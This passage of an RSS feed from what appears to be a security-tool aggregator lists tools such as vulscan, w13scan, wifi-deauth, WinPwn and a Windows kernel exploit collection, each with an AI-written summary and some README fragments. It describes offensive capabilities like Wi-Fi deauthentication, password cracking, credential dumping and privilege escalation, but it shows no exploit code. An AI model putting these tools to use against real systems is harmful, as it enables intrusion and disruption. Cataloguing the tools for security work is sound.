&lt;/p&gt;</description></item><item><title>vulscan</title><link>https://rainmana.github.io/hackyfeed/tools/scipag-vulscan/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/scipag-vulscan/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Vulscan is a powerful Nmap module that transforms the commonly used network scanning tool into an effective vulnerability scanner by leveraging version detection to identify potential flaws in services. It utilizes various pre-defined vulnerability databases such as VulDB and CVE, with the capability of supporting custom databases for enhanced flexibility. Notable features include automatic updates for vulnerability databases and configurable settings to optimize match priority and version detection.&lt;/p&gt;</description></item><item><title>w13scan</title><link>https://rainmana.github.io/hackyfeed/tools/w-digital-scanner-w13scan/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/w-digital-scanner-w13scan/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; W13Scan is an open-source web vulnerability scanner written in Python3, capable of both active and passive scanning modes across Windows, Linux, and Mac platforms. It features a comprehensive suite of detection plugins, including XSS, SQL injection, and file leakage checks, along with customizable modules for specialized environments, ensuring high accuracy and adaptability for security professionals.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 align="center"&gt;W13Scan&lt;/h1&gt;
&lt;blockquote&gt;
&lt;p&gt;W13scan 是基于Python3的一款开源的Web漏洞发现工具,它支持主动扫描模式和被动扫描模式，能运行在Windows、Linux、Mac上。&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;&lt;a href="https://github.com/boy-hack/w13scan/issues"&gt;&lt;img src="https://img.shields.io/github/issues/boy-hack/w13scan" alt="GitHub issues"&gt;&lt;/a&gt; &lt;a href="https://github.com/boy-hack/w13scan/stargazers"&gt;&lt;img src="https://img.shields.io/github/stars/boy-hack/w13scan" alt="GitHub stars"&gt;&lt;/a&gt; &lt;a href="https://github.com/boy-hack/w13scan/network"&gt;&lt;img src="https://img.shields.io/github/forks/boy-hack/w13scan" alt="GitHub forks"&gt;&lt;/a&gt; &lt;a href="https://github.com/boy-hack/w13scan/blob/master/LICENSE"&gt;&lt;img src="https://img.shields.io/github/license/boy-hack/w13scan" alt="GitHub license"&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;&lt;img src="./doc/logo.jpg" alt="Jietu20200516-184214"&gt;&lt;/p&gt;
&lt;p&gt;html模板源码:&lt;a href="https://github.com/boy-hack/w13scan-report"&gt;w13scan-report&lt;/a&gt;&lt;/p&gt;
&lt;h2 id="声明"&gt;声明&lt;/h2&gt;
&lt;p&gt;使用W13Scan前请遵守当地法律,W13Scan仅提供给教育行为使用。&lt;/p&gt;</description></item><item><title>WADComs.github.io</title><link>https://rainmana.github.io/hackyfeed/tools/wadcoms-wadcoms.github.io/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/wadcoms-wadcoms.github.io/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; WADComs is an interactive cheat sheet designed for offensive security professionals, offering a curated list of tools and their commands specifically for targeting Windows and Active Directory environments. Its primary use case is to aid security experts in executing effective penetration testing by providing quick access to essential commands. Notable features include its comprehensive tool listings and command syntaxes, all consolidated in a web-based format for ease of use.&lt;/p&gt;</description></item><item><title>Watcher</title><link>https://rainmana.github.io/hackyfeed/tools/thalesgroup-cert-watcher/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/thalesgroup-cert-watcher/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Watcher is an AI-powered automated cybersecurity threat detection platform built on Django and React JS, enabling organizations to proactively identify and monitor emerging cybersecurity threats. Its primary use case includes automated intelligence analysis, real-time alerts for trending cybersecurity topics, and comprehensive domain management to combat potential cyber threats. Notable features encompass information leak monitoring, malicious domain surveillance, and integration with external threat intelligence sources for enhanced situational awareness.&lt;/p&gt;</description></item><item><title>wazuh</title><link>https://rainmana.github.io/hackyfeed/tools/wazuh-wazuh/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/wazuh-wazuh/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Wazuh is an open-source security platform designed for threat prevention, detection, and response across various environments, including on-premises, virtualized, containerized, and cloud settings. It features an endpoint security agent that collects data for analysis by a centralized management server, fully integrated with the Elastic Stack for enhanced search and visualization of security alerts. Key capabilities include intrusion detection, log data analysis, file integrity monitoring, vulnerability detection, configuration assessment, and automated incident response, making it a comprehensive tool for maintaining security compliance and mitigating threats.&lt;/p&gt;</description></item><item><title>Web_Hacking</title><link>https://rainmana.github.io/hackyfeed/tools/mehdi0x90-web_hacking/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/mehdi0x90-web_hacking/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Web Hacking is a comprehensive repository of notes focused on bug bounty hunting and penetration testing, collating various techniques for vulnerability discovery and exploitation. The tool features extensive reconnaissance and OSINT methods, a detailed list of common vulnerabilities, and bypass techniques, making it a valuable resource for security professionals seeking to enhance their skills and methodologies in web application security. Additionally, it encourages community contributions, fostering continuous improvement and updates of its content.&lt;/p&gt;</description></item><item><title>Web-App-Pentest-Checklist</title><link>https://rainmana.github.io/hackyfeed/tools/hari-prasaanth-web-app-pentest-checklist/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/hari-prasaanth-web-app-pentest-checklist/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; The &amp;ldquo;Web App Pentest Checklist&amp;rdquo; is a comprehensive OWASP-based tool designed for web application security assessments, featuring over 500 test cases across various categories such as information gathering, configuration management, and vulnerability testing. Its extensive coverage includes methods for reconnaissance, fingerprinting technologies, and testing for security misconfigurations and common vulnerabilities, making it an essential resource for penetration testers. Notable features include detailed checklists for enumerating applications, verifying configurations, and ensuring compliance with security best practices.&lt;/p&gt;</description></item><item><title>Web-Cache-Vulnerability-Scanner</title><link>https://rainmana.github.io/hackyfeed/tools/hackmanit-web-cache-vulnerability-scanner/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/hackmanit-web-cache-vulnerability-scanner/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Web Cache Vulnerability Scanner (WCVS) is a command-line interface tool designed to identify and exploit web cache poisoning and deception vulnerabilities across various web applications. It supports multiple techniques for both attack types, features a crawler for discovering additional URLs, and can be integrated into CI/CD processes to streamline security practices. Notable functionalities include customizable request handling, JSON report generation, and the ability to route traffic through a proxy for enhanced testing versatility.&lt;/p&gt;</description></item><item><title>web-check</title><link>https://rainmana.github.io/hackyfeed/tools/lissy93-web-check/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/lissy93-web-check/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; 🕵️‍♂️ All-in-one OSINT tool for analysing any website&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;🕵️‍♂️ All-in-one OSINT tool for analysing any website&lt;/p&gt;</description></item><item><title>Web-Fuzzing-Box</title><link>https://rainmana.github.io/hackyfeed/tools/gh0stkey-web-fuzzing-box/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/gh0stkey-web-fuzzing-box/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Web-Fuzzing-Box is a tool designed for web application security testing, offering a diverse collection of dictionaries and payloads for conducting fuzzing attacks, including brute force, directory and file enumeration, and exploitation of web vulnerabilities. Notable features include a comprehensive suite of dictionaries tailored for specific vulnerabilities such as SQL injection, XSS, and authentication bypass, as well as case studies demonstrating the practical application of these resources in real-world scenarios. This tool is particularly valuable for penetration testers and security researchers seeking to enhance their web application assessments.&lt;/p&gt;</description></item><item><title>webanalyze</title><link>https://rainmana.github.io/hackyfeed/tools/rverton-webanalyze/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/rverton-webanalyze/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Webanalyze is a performance-oriented tool written in Go that identifies technologies used by web applications by analyzing HTTP responses from specified hosts. Its primary use case is for security assessments and technology profiling, supporting bulk analysis of multiple hosts via input files and offering output in various formats such as CSV and JSON. Notable features include the ability to crawl links from a root page, search for subdomains, and download updated app definitions from the Wappalyzer repository.&lt;/p&gt;</description></item><item><title>webcopilot</title><link>https://rainmana.github.io/hackyfeed/tools/h4r5h1t-webcopilot/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/h4r5h1t-webcopilot/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; WebCopilot is an automation tool for security assessments that enumerates subdomains of a target domain and scans for vulnerabilities such as XSS, SQLi, and RCE. It employs various open-source tools for subdomain enumeration, active scanning, endpoint crawling, and filtering of vulnerability parameters, ultimately presenting the results in a structured manner. Notable features include comprehensive subdomain enumeration, endpoint crawling, and integration with multiple vulnerability scanning tools.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 align="center"&gt;&lt;a href="https://github.com/h4r5h1t/webcopilot/"&gt;WebCopilot&lt;/a&gt;&lt;/h1&gt;
&lt;h4 align="center"&gt;An automation tool that enumerate subdomains then filters out xss, sqli, open redirect, lfi, ssrf and rce parameters and then scans for vulnerabilities.&lt;/h4&gt;
&lt;p align="center"&gt;
&lt;a href="https://twitter.com/h4r5h1t_hrs"&gt;&lt;img src="https://img.shields.io/twitter/follow/h4r5h1t_hrs?style=social"&gt;&lt;/a&gt;
&lt;a href="https://github.com/h4r5h1t?tab=followers"&gt;&lt;img src="https://img.shields.io/github/followers/h4r5h1t?style=social"&gt;&lt;/a&gt;
&lt;a href="https://github.com/h4r5h1t/webcopilot/issues"&gt;&lt;img src="https://img.shields.io/badge/contributions-welcome-brightgreen.svg?style=flat"&gt;&lt;/a&gt;
&lt;a href="https://github.com/h4r5h1t/webcopilot/blob/master/LICENSE"&gt;&lt;img src="https://img.shields.io/badge/License-MIT-yellow.svg"&gt;&lt;/a&gt;
&lt;a href="#"&gt;&lt;img src="https://img.shields.io/badge/Made%20with-Bash-1f425f.svg"&gt;&lt;/a&gt;
&lt;a href="#"&gt;&lt;img src="https://madewithlove.org.in/badge.svg"&gt;&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>webcrack</title><link>https://rainmana.github.io/hackyfeed/tools/j4k0xb-webcrack/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/j4k0xb-webcrack/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; webcrack is a reverse engineering tool designed for JavaScript that deobfuscates code produced by obfuscator.io, unminifies, and unpacks files from webpack and browserify, aiming to restore the original source code structure. Notable features include performance optimizations, auto-detection of code patterns, and the removal of obfuscator artifacts, all implemented in TypeScript with a robust testing suite. The tool is accessible via a command line interface and offers an API for integration into other applications.&lt;/p&gt;</description></item><item><title>webkiller</title><link>https://rainmana.github.io/hackyfeed/tools/ultrasecurity-webkiller/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/ultrasecurity-webkiller/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; WebKiller V2 is a Python-based tool designed for information gathering and CMS detection in web applications. Its primary use case is to aid cybersecurity professionals in identifying vulnerabilities and obtaining crucial data about target websites. Notable features include a user-friendly command-line interface, compatibility with multiple operating systems, and comprehensive installation instructions.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;p&gt;&lt;a href="http://www.python.org/download/"&gt;&lt;img src="https://img.shields.io/badge/Python-3.5-yellow.svg" alt="Python 3.5"&gt;&lt;/a&gt;&lt;/p&gt;
&lt;h1 id="webkiller-v2"&gt;WebKiller V2&lt;/h1&gt;
&lt;p&gt;Tool Information Gathering Write With Python.&lt;/p&gt;
&lt;h2 id="preview"&gt;PreView&lt;/h2&gt;
&lt;pre&gt;

 
 ██╗ ██╗███████╗██████╗ ██╗ ██╗██╗██╗ ██╗ ███████╗██████╗ 
 ██║ ██║██╔════╝██╔══██╗██║ ██╔╝██║██║ ██║ ██╔════╝██╔══██╗
 ██║ █╗ ██║█████╗ ██████╔╝█████╔╝ ██║██║ ██║ █████╗ ██████╔╝
 ██║███╗██║██╔══╝ ██╔══██╗██╔═██╗ ██║██║ ██║ ██╔══╝ ██╔══██╗
 ╚███╔███╔╝███████╗██████╔╝██║ ██╗██║███████╗███████╗███████╗██║ ██║
 ╚══╝╚══╝ ╚══════╝╚═════╝ ╚═╝ ╚═╝╚═╝╚══════╝╚══════╝╚══════╝╚═╝ ╚═╝
 ====================================================================
 ** WebSite : UltraSec.org **
 ** Channel : @UltraSecurity **
 ** Developers : Ultra Security Team **
 ** Thank's : .::Shayan::. **
 ==================================================================== 
 
 [$] Choose one of the options below 

 [1] Information Gathering

 [2] CMS Detection

 [3] Developer :)

 [4] Exit . . .

 ┌─[WEBKILLER~@HOME]
 └──╼ $ 


&lt;/pre&gt;
&lt;h2 id="operating-systems-tested"&gt;Operating Systems Tested&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;Kali Linux 2020.1&lt;/li&gt;
&lt;li&gt;Windows 10&lt;/li&gt;
&lt;li&gt;Ubuntu 19.10&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="install"&gt;Install&lt;/h2&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;git clone https://github.com/ultrasecurity/webkiller.git
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;cd webkiller
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;pip3 install -r requirements.txt
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;python3 webkiller.py 
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h2 id="screenshot"&gt;ScreenShot&lt;/h2&gt;
&lt;p&gt;&lt;img src="http://uupload.ir/files/otmb_webkiller.jpg" alt="webkiller"&gt;&lt;/p&gt;</description></item><item><title>WebPlotDigitizer</title><link>https://rainmana.github.io/hackyfeed/tools/automeris-io-webplotdigitizer/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/automeris-io-webplotdigitizer/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; WebPlotDigitizer is a computer vision-assisted tool designed to extract numerical data from images of data visualizations, facilitating data retrieval for researchers and professionals across various fields. Its primary use case is converting graphical data representations, such as plots and charts, into usable datasets. Notable features include a user-friendly interface and cloud-based AI support for enhanced data extraction capabilities.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 id="webplotdigitizer"&gt;WebPlotDigitizer&lt;/h1&gt;
&lt;p&gt;A large quantity of useful data is locked away in images of data visualizations. WebPlotDigitizer is a computer vision assisted software that helps extract numerical data from images of a variety of data visualizations.&lt;/p&gt;</description></item><item><title>WechatMagician</title><link>https://rainmana.github.io/hackyfeed/tools/gh0u1l5-wechatmagician/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/gh0u1l5-wechatmagician/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; WechatMagician is an Xposed plugin that empowers users to control chat messages and Moments in WeChat, supporting versions 6.5.3 and above. Its notable features include preventing message recalls, allowing multiple image sends, and blocking advertisements in Moments, while maintaining a modular design for stability and ease of use. The tool also offers privacy-focused functionalities, such as marking chats as read in bulk and hiding chat traces with designated friends.&lt;/p&gt;</description></item><item><title>weird_proxies</title><link>https://rainmana.github.io/hackyfeed/tools/grrrdog-weird_proxies/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/grrrdog-weird_proxies/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Weird Proxies is a comprehensive cheat sheet designed to document the behaviors and vulnerabilities of various reverse proxies, cache proxies, and load balancers. The tool serves as a resource for security professionals analyzing potential security threats and related attack vectors associated with commonly used proxy technologies like Nginx, Apache, and AWS. Notable features include detailed analyses and links to additional research articles, offering practical insights for understanding weaknesses in proxy configurations.&lt;/p&gt;</description></item><item><title>weirdAAL</title><link>https://rainmana.github.io/hackyfeed/tools/carnal0wnage-weirdaal/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/carnal0wnage-weirdaal/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; WeirdAAL (AWS Attack Library) is a tool designed for simulating and performing various attack scenarios specifically targeting Amazon Web Services environments. Its primary use case is to aid security professionals in understanding and mitigating potential vulnerabilities within AWS by utilizing a comprehensive collection of attack vectors. Notable features include extensive documentation and potential integration with other security testing frameworks.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 id="weirdaal-aws-attack-library"&gt;WeirdAAL (AWS Attack Library)&lt;/h1&gt;
&lt;p&gt;WeirdAAL (AWS Attack Library)&lt;/p&gt;</description></item><item><title>wesng</title><link>https://rainmana.github.io/hackyfeed/tools/bitsadmin-wesng/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/bitsadmin-wesng/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Windows Exploit Suggester - Next Generation (WES-NG) is a vulnerability assessment tool for Windows operating systems from XP to 11, leveraging the output of the &lt;code&gt;systeminfo&lt;/code&gt; utility to identify potential vulnerabilities and applicable exploits. The tool supports multiple methods for patch assessment and incorporates a database updated from various security sources, including the Microsoft Security Update API. Notable features include the ability to validate missing patches against Microsoft&amp;rsquo;s Update Catalog and a collector for maintaining an up-to-date vulnerability database.&lt;/p&gt;</description></item><item><title>Whaler</title><link>https://rainmana.github.io/hackyfeed/tools/p3gleg-whaler/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/p3gleg-whaler/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Whaler is a Go-based tool that facilitates the reverse engineering of Docker images by reconstructing the Dockerfile that generated them. Its primary use case involves extracting valuable information from Docker images, such as identifying added files, detecting potential secret files, and displaying metadata including open ports and environment variables. Notable features include the ability to automatically pull Docker images, filter out irrelevant filenames, and save image layers for further analysis.&lt;/p&gt;</description></item><item><title>WhatBreach</title><link>https://rainmana.github.io/hackyfeed/tools/ekultek-whatbreach/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/ekultek-whatbreach/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; WhatBreach is an OSINT tool designed to identify and aggregate data on email breaches from various sources, enabling users to assess the security status of one or multiple email addresses. Key features include integration with APIs like haveibeenpwned.com for breach detection, dehashed.com for database searches, and additional functionality for domain investigation and pastes analysis from platforms such as Pastebin. The tool also supports request throttling to prevent service blocking, customizable output directories for data downloads, and verification of email deliverability.&lt;/p&gt;</description></item><item><title>whatsapp-osint</title><link>https://rainmana.github.io/hackyfeed/tools/jasperan-whatsapp-osint/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/jasperan-whatsapp-osint/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; WhatsApp Beacon is an OSINT tracking tool designed to monitor the online status of specific WhatsApp contacts, storing session data in SQLite for analysis. It features automated installation, headless operation, and advanced analytics capabilities, including exporting data to Excel and generating detailed HTML reports with visualizations. This tool emphasizes ethical use for educational and research purposes.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 id="-whatsapp-beacon-osint-tracker"&gt;🕵️‍♂️ WhatsApp Beacon (OSINT Tracker)&lt;/h1&gt;
&lt;p&gt;&lt;a href="https://pypi.org/project/whatsapp-osint/"&gt;&lt;img src="https://img.shields.io/pypi/v/whatsapp-osint?style=for-the-badge&amp;amp;logo=pypi&amp;amp;logoColor=white" alt="PyPI"&gt;&lt;/a&gt;
&lt;img src="https://img.shields.io/badge/license-MIT-blue.svg?style=for-the-badge" alt="License"&gt;
&lt;img src="https://img.shields.io/badge/python-3.8%2B-blue?style=for-the-badge" alt="Python"&gt;
&lt;img src="https://img.shields.io/badge/platform-linux%20%7C%20macos%20%7C%20windows-lightgrey?style=for-the-badge" alt="Platform"&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;WhatsApp Beacon&lt;/strong&gt; tracks when specific WhatsApp contacts go online and stores every completed session in SQLite. It can export to Excel, generate a polished analytics dashboard, and run fully headless once the session is authenticated.&lt;/p&gt;</description></item><item><title>WhatsMyName</title><link>https://rainmana.github.io/hackyfeed/tools/webbreacher-whatsmyname/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/webbreacher-whatsmyname/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; WhatsMyName is an open-source tool designed for OSINT practitioners to identify whether specific usernames are registered on various websites, using a central JSON data file of accessible sites that adhere to specific URL format criteria. The project has shifted its focus from direct username checking scripts to maintaining and enhancing its dataset, which supports various third-party tools and extensions for username validation across diverse platforms. Notable features include community-driven contributions, compatibility with multiple user-checking tools, and the ability to integrate with user-friendly web interfaces and applications.&lt;/p&gt;</description></item><item><title>wholeaked</title><link>https://rainmana.github.io/hackyfeed/tools/utkusen-wholeaked/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/utkusen-wholeaked/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; wholeaked is a Go-based file-sharing tool designed to identify the responsible individual in the event of a document leakage. It accomplishes this by creating a unique hidden signature for each recipient, which is embedded in the shared file, and offers integrations with services such as Sendgrid and AWS SES for automated file distribution. Key features include compatibility with various file types and enhanced functionality for common formats like PDF and DOCX, enabling both automated and manual sharing.&lt;/p&gt;</description></item><item><title>wifi-deauth</title><link>https://rainmana.github.io/hackyfeed/tools/flashnuke-wifi-deauth/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/flashnuke-wifi-deauth/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Wifi-deauth is a cybersecurity tool designed to perform denial-of-service (DoS) attacks by disconnecting all devices from a targeted Wi-Fi network without requiring the network&amp;rsquo;s password. It operates by sending spoofed deauthentication packets to both the access point and its connected clients, with the capability to operate across multiple channels simultaneously, supporting both 2.4GHz and 5GHz bands. Notable features include the ability to filter attacks by specific SSIDs or BSSIDs, optional usage of multiple interfaces, and tailored channel scanning to enhance attack efficacy.&lt;/p&gt;</description></item><item><title>Wifi-Hacking</title><link>https://rainmana.github.io/hackyfeed/tools/ankit0183-wifi-hacking/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/ankit0183-wifi-hacking/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Wifi-Hacking is a cybersecurity tool designed to penetrate and retrieve Wi-Fi passwords using various methods, including scanning networks, capturing handshakes, and employing WPS attacks. Its notable features include the ability to start and stop monitor mode, create custom wordlists for cracking, and support for multiple Linux-based operating systems, making it versatile for penetration testing and educational purposes. Users are cautioned to utilize this tool responsibly and ethically.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;p&gt;&lt;a href="http://www.python.org/download/"&gt;&lt;img src="https://img.shields.io/badge/Python-3.5-yellow.svg" alt="Python 3.5"&gt;&lt;/a&gt;
&lt;a href="https://www.python.org/downloads/release/python-2714/"&gt;&lt;img src="https://img.shields.io/badge/python-2.7-brightgreen.svg" alt="python"&gt;&lt;/a&gt;
&lt;a href="https://termux.com/"&gt;&lt;img src="https://img.shields.io/badge/Tested%20On-Linux%20%7C%20Android-yellowgreen.svg" alt="OS"&gt;&lt;/a&gt;&lt;/p&gt;</description></item><item><title>windows-kernel-exploits</title><link>https://rainmana.github.io/hackyfeed/tools/secwiki-windows-kernel-exploits/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/secwiki-windows-kernel-exploits/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; The windows-kernel-exploits repository provides a collection of exploit code snippets for various vulnerabilities in the Windows kernel, leveraging known CVEs to demonstrate potential elevation of privilege and remote code execution attacks. This tool primarily serves security researchers and penetration testers conducting vulnerability assessments on Windows operating systems. Notable features include comprehensive listings of CVEs, along with links to proof-of-concept exploits and detailed descriptions for a wide range of Windows versions.&lt;/p&gt;</description></item><item><title>Windows-Local-Privilege-Escalation-Cookbook</title><link>https://rainmana.github.io/hackyfeed/tools/nickvourd-windows-local-privilege-escalation-cookbook/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/nickvourd-windows-local-privilege-escalation-cookbook/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; The Windows Local Privilege Escalation Cookbook is designed to educate users on local privilege escalation techniques within Windows environments, focusing on exploiting misconfiguration vulnerabilities. It provides structured guidance, including sections on description, lab setup, enumeration, exploitation, and mitigation for various vulnerabilities, while also emphasizing ethical usage and the need for responsible application of the techniques outlined. Notably, it excludes evasion tactics and includes a PowerShell script for disabling Windows Defender under specific conditions.&lt;/p&gt;</description></item><item><title>WinPwn</title><link>https://rainmana.github.io/hackyfeed/tools/s3cur3th1ssh1t-winpwn/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/s3cur3th1ssh1t-winpwn/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; WinPwn is a comprehensive PowerShell-based tool designed for internal penetration testing, emphasizing automation and proxy support for reconnaissance and exploitation tasks. Its notable features include modules for session management, credential dumping, local and domain reconnaissance, and privilege escalation checks, alongside the ability to operate offline and integrate well-known offensive security scripts. The tool streamlines the penetration testing process with an interactive menu for selecting various attack methods and extensive built-in reconnaissance capabilities.&lt;/p&gt;</description></item><item><title>wireless-carplay-dongle-reverse-engineering</title><link>https://rainmana.github.io/hackyfeed/tools/ludwig-v-wireless-carplay-dongle-reverse-engineering/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/ludwig-v-wireless-carplay-dongle-reverse-engineering/</guid><description>&lt;blockquote&gt;
